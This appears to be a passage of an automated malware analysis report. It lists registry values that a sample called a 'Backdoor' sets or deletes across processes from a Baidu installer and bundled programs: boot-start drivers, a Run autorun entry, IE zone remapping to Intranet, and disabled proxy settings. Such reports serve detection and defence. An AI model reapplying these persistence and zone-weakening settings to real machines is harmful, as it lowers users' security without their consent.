[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process Baidu_Setup_1.6.200.359_ftn_1050103060.exe:572 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8E 2A 86 DF 87 42 1F DE 6C 45 C7 38 5D 51 6D 3E"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Baidu\BaiduYouQian\packageinstall]
"param" = "Xxjh9G0tXMLez7O2T5upZbVkEFeGSirxy9dYQekwVzz3Z1ikJ jGDPSC0WRykW8aBmNrUQLi0OivztreQTX3edZTHioyulIhwOqiMyhdNK5MIUOU gYtMOfnR5maiaU9pCLak4mk2g7IGTEYLRGOkoo0QxbHsGj8Iv7jDuuJCgpSTL4Y2DQ0HuRIvWnwySHLybfpSRZkg29W8v/4oj0Bw2BJW6DWTg9VdBGmSEvZ1Ts8wvoZ41Dg nELDVclUFp2ihqcJPWYwTXJCCUc98tEqHuPf1CmzlAFFQaavUCwz/Geq45ALZiGAvlfHXZEJ5fQ50uD7lzwPCim6hqqGPp ra6HcmESFC6V1MGyIxU4kJzPtnT2xv67aOTXPT8nGfpbFBbAHxoLdmNabYU fdZPJ c U3HbzBeobPqJaOO53jaDjLf0PdEjDEbJ2SzaKRY/DRxht3tDna1XSlm7YdkX6bm FDwTl/NceoohXMxusa67Qs1QZBglQJ6EkgMFnwwh"

The process Baidu_Setup_1.6.200.359_ftn_1050103060.exe:3100 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359]
"baidu.exe" = "百度主程序"

[HKLM\System\CurrentControlSet\Services\bduniptk]
"Group" = "bddriver"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Baidu\Baidu\ConStatus]
"AutoRun" = "1"

[HKLM\SOFTWARE\Baidu\bcservice]
"Version" = "2.0.3.124"

[HKLM\System\CurrentControlSet\Services\bd0001]
"Type" = "1"

[HKLM\System\CurrentControlSet\Services\BDCEnhance]
"DisplayName" = "BDCEnhance"

[HKLM\SOFTWARE\Baidu\bcservice]
"INSTLANG" = "2052"

[HKLM\SOFTWARE\Baidu\Baidu]
"InstallDate" = "2015-10-14"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 22 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"Tag" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\百度]
"DisplayVersion" = "1.6.200.359"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\System\CurrentControlSet\Services\bduniptk]
"Tag" = "2"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"ErrorControl" = "0"

[HKLM\System\CurrentControlSet\Services\BDCEnhance]
"Group" = "bddriver"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\百度]
"UninstallString" = "%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\uninst.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\百度]
"DisplayName" = "百度"

[HKLM\System\CurrentControlSet\Services\bduniptk]
"Description" = "bduniptk"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\SOFTWARE\Baidu\Baidu]
"INSTLANG" = "2052"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D0 5C 53 84 94 F6 EE 3E F4 4F 2B 4D B5 25 61 82"

[HKLM\SOFTWARE\Baidu\bcservice]
"InstallDate" = "2015-10-14"

[HKLM\System\CurrentControlSet\Services\bd0001]
"DisplayName" = "bd0001"

[HKLM\SOFTWARE\Baidu\bcservice]
"RtpFlag" = "273"
"InstallDir" = "%Documents and Settings%\All Users\Baidu\bcservice"

[HKLM\System\CurrentControlSet\Services\BDCEnhance]
"Description" = "BDCEnhance"

[HKLM\System\CurrentControlSet\Services\bduniptk]
"ErrorControl" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPoicy\{73F970DA-48AC-43F1-9848-FB90504CE3E9}]
"AppName" = "Baidu.exe"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"Group" = "bddriver"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Services\bd0001]
"Tag" = "1"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"ImagePath" = "system32\DRIVERS\BDArKit.sys"
"Description" = "BDArKit"

[HKLM\SOFTWARE\Baidu\Baidu]
"BrowserSelected" = "2"

[HKLM\System\CurrentControlSet\Services\bduniptk]
"Type" = "1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\System\CurrentControlSet\Services\bduniptk]
"ImagePath" = "system32\DRIVERS\bduniptk.sys"

[HKLM\System\CurrentControlSet\Services\bd0001]
"ImagePath" = "system32\DRIVERS\bd0001.sys"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"Type" = "1"

[HKLM\SOFTWARE\Baidu\Baidu]
"Version" = "1.6.200.359"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Services\bd0001]
"ErrorControl" = "0"

[HKLM\SOFTWARE\Baidu\bcservice]
"SupplyID" = "10000302"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\百度]
"DisplayIcon" = "%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Baidu.exe,0"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPoicy\{73F970DA-48AC-43F1-9848-FB90504CE3E9}]
"Policy" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Baidu\Baidu]
"TN" = "SE_Baiduclient_9vpgkwv8"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPoicy\{73F970DA-48AC-43F1-9848-FB90504CE3E9}]
"AppPath" = "%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\System\CurrentControlSet\Services\BDCEnhance]
"ErrorControl" = "0"

[HKLM\SOFTWARE\Baidu\Baidu]
"SupplyID" = "1050103060"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"bddriver" = "02 00 00 00 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\百度]
"Publisher" = "百度在线网络技术(北京)有限公司"

[HKLM\SOFTWARE\Baidu\Baidu]
"InstallDir" = "%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient"

[HKLM\System\CurrentControlSet\Services\BDCEnhance]
"Type" = "1"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"DisplayName" = "BDArKit"

[HKLM\System\CurrentControlSet\Control\ServiceGroupOrder]
"List" = "System Reserved, Boot Bus Extender, System Bus Extender, SCSI miniport, Port, Primary Disk, SCSI Class, SCSI CDROM Class, FSFilter Infrastructure, FSFilter System, FSFilter Bottom, FSFilter Copy Protection, FSFilter Security Enhancer, FSFilter Open File, FSFilter Physical Quota Management, FSFilter Encryption, FSFilter Compression, FSFilter HSM, FSFilter Cluster File System, FSFilter System Recovery, FSFilter Quota Management, FSFilter Content Screener, FSFilter Continuous Backup, FSFilter Replication, FSFilter Anti-Virus, FSFilter Undelete, bddriver, FSFilter Activity Monitor, FSFilter Top, Filter, Boot File System, Base, Pointer Port, Keyboard Port, Pointer Class, Keyboard Class, Video Init, Video, Video Save, File System, Event Log, Streams Drivers, NDIS Wrapper, COM Infrastructure, UIGroup, LocalValidation, PlugPlay, PNP_TDI, NDIS, TDI, NetBIOSGroup, ShellSvcGroup, SchedulerGroup, SpoolerGroup, AudioGroup, SmartCardGroup, NetworkProvider, RemoteValidation, NetDDEGroup, Parallel arbitrator, Extended Base, PCI Configuration, MS Transactions"

[HKLM\System\CurrentControlSet\Services\BDCEnhance]
"Tag" = "5"

[HKLM\System\CurrentControlSet\Services\bd0001]
"Group" = "bddriver"

[HKLM\System\CurrentControlSet\Services\bduniptk]
"DisplayName" = "bduniptk"

[HKLM\System\CurrentControlSet\Services\BDCEnhance]
"ImagePath" = "system32\DRIVERS\BDCEnhance.sys"

[HKLM\SOFTWARE\Baidu\Baidu]
"channel" = "MainFrame=0,SearchBar=1,Tray=1"

[HKLM\System\CurrentControlSet\Services\bd0001]
"Description" = "bd0001"

The following driver will be automatically launched by the NT Native code (IoInitSystem method):

[HKLM\System\CurrentControlSet\Services\bduniptk]
"Start" = "1"

The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

To automatically run itself each time Windows is booted, the Backdoor adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"BaiduClient" = "%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Baidu.exe -noclient"

The following service will be launched automatically at system boot up:

[HKLM\System\CurrentControlSet\Services\BDArKit]
"Start" = "2"

The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The following driver will be automatically launched by the NT Native code (IoInitSystem method):

[HKLM\System\CurrentControlSet\Services\BDCEnhance]
"Start" = "1"

[HKLM\System\CurrentControlSet\Services\bd0001]
"Start" = "1"

The Backdoor deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Baidu\bcservice]
"RtpFlag"

[HKLM\System\CurrentControlSet\Services\BDCEnhance]
"DeleteFlag"

[HKLM\System\CurrentControlSet\Services\bduniptk]
"DeleteFlag"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKLM\System\CurrentControlSet\Services\bd0001]
"DeleteFlag"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"DeleteFlag"

The process bcservice.exe:2752 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Services\bduniptk]
"ErrorControl" = "0"

[HKLM\System\CurrentControlSet\Services\BDCEnhance]
"Group" = "bddriver"

[HKLM\System\CurrentControlSet\Services\bd0001]
"Tag" = "1"

[HKLM\System\CurrentControlSet\Services\bduniptk]
"Group" = "bddriver"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"bddriver" = "02 00 00 00 01 00 00 00 02 00 00 00"

[HKLM\System\CurrentControlSet\Services\BDCEnhance]
"ErrorControl" = "0"

[HKLM\System\CurrentControlSet\Services\bduniptk]
"Description" = "bduniptk"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"ImagePath" = "system32\DRIVERS\BDArKit.sys"

[HKLM\System\CurrentControlSet\Services\bd0001]
"Type" = "1"

[HKLM\System\CurrentControlSet\Services\bduniptk]
"Type" = "1"
"ImagePath" = "system32\DRIVERS\bduniptk.sys"

[HKLM\System\CurrentControlSet\Services\BDCEnhance]
"DisplayName" = "BDCEnhance"

[HKLM\System\CurrentControlSet\Services\bd0001]
"ImagePath" = "system32\DRIVERS\bd0001.sys"

[HKLM\System\CurrentControlSet\Services\BDCEnhance]
"Type" = "1"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"DisplayName" = "BDArKit"
"Type" = "1"
"Tag" = "4"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D2 F7 47 5D B4 AE 81 66 2A 86 71 8F 4C A1 3B 68"

[HKLM\System\CurrentControlSet\Services\BDCEnhance]
"Tag" = "5"

[HKLM\System\CurrentControlSet\Services\bd0001]
"Group" = "bddriver"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"Group" = "bddriver"

[HKLM\System\CurrentControlSet\Services\bd0001]
"DisplayName" = "bd0001"
"ErrorControl" = "0"

[HKLM\System\CurrentControlSet\Services\bduniptk]
"DisplayName" = "bduniptk"

[HKLM\System\CurrentControlSet\Services\BDCEnhance]
"ImagePath" = "system32\DRIVERS\BDCEnhance.sys"

[HKLM\System\CurrentControlSet\Services\bduniptk]
"Tag" = "2"

[HKLM\System\CurrentControlSet\Services\BDCEnhance]
"Description" = "BDCEnhance"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"Description" = "BDArKit"

[HKLM\System\CurrentControlSet\Services\bd0001]
"Description" = "bd0001"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"ErrorControl" = "0"

The following service will be launched automatically at system boot up:

[HKLM\System\CurrentControlSet\Services\BDArKit]
"Start" = "2"

The following driver will be automatically launched by the NT Native code (IoInitSystem method):

[HKLM\System\CurrentControlSet\Services\bduniptk]
"Start" = "1"

[HKLM\System\CurrentControlSet\Services\BDCEnhance]
"Start" = "1"

[HKLM\System\CurrentControlSet\Services\bd0001]
"Start" = "1"

The Backdoor deletes the following value(s) in system registry:

[HKLM\System\CurrentControlSet\Services\BDCEnhance]
"DeleteFlag"

[HKLM\System\CurrentControlSet\Services\BDArKit]
"DeleteFlag"

[HKLM\System\CurrentControlSet\Services\bd0001]
"DeleteFlag"

[HKLM\System\CurrentControlSet\Services\bduniptk]
"DeleteFlag"

The process DownLoad.exe:3484 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 25 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BD E8 68 99 C7 00 5B 42 A8 43 39 D8 FE 73 DA BB"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:1832 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E4 F7 2B 67 27 02 36 EE A9 1A C4 BF ED 7F 48 74"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process KZReport.exe:1836 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\KuaiZip\Report]
"TimeStamp" = "1444776085"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\KuaiZip\Report]
"ReportInstalled" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\KuaiZip\Report]
"DefaultSoftTimestamp" = "1444776085"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "27 F2 49 EF DF A4 A3 03 26 EF DD E6 91 16 FE FF"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process 9158IE.exe:3432 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\9158web\120025]
"RoomID" = "120025"
"RoomMaxOnlineUser" = "0"
"UserId" = ""
"RoomTypeName" = "3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
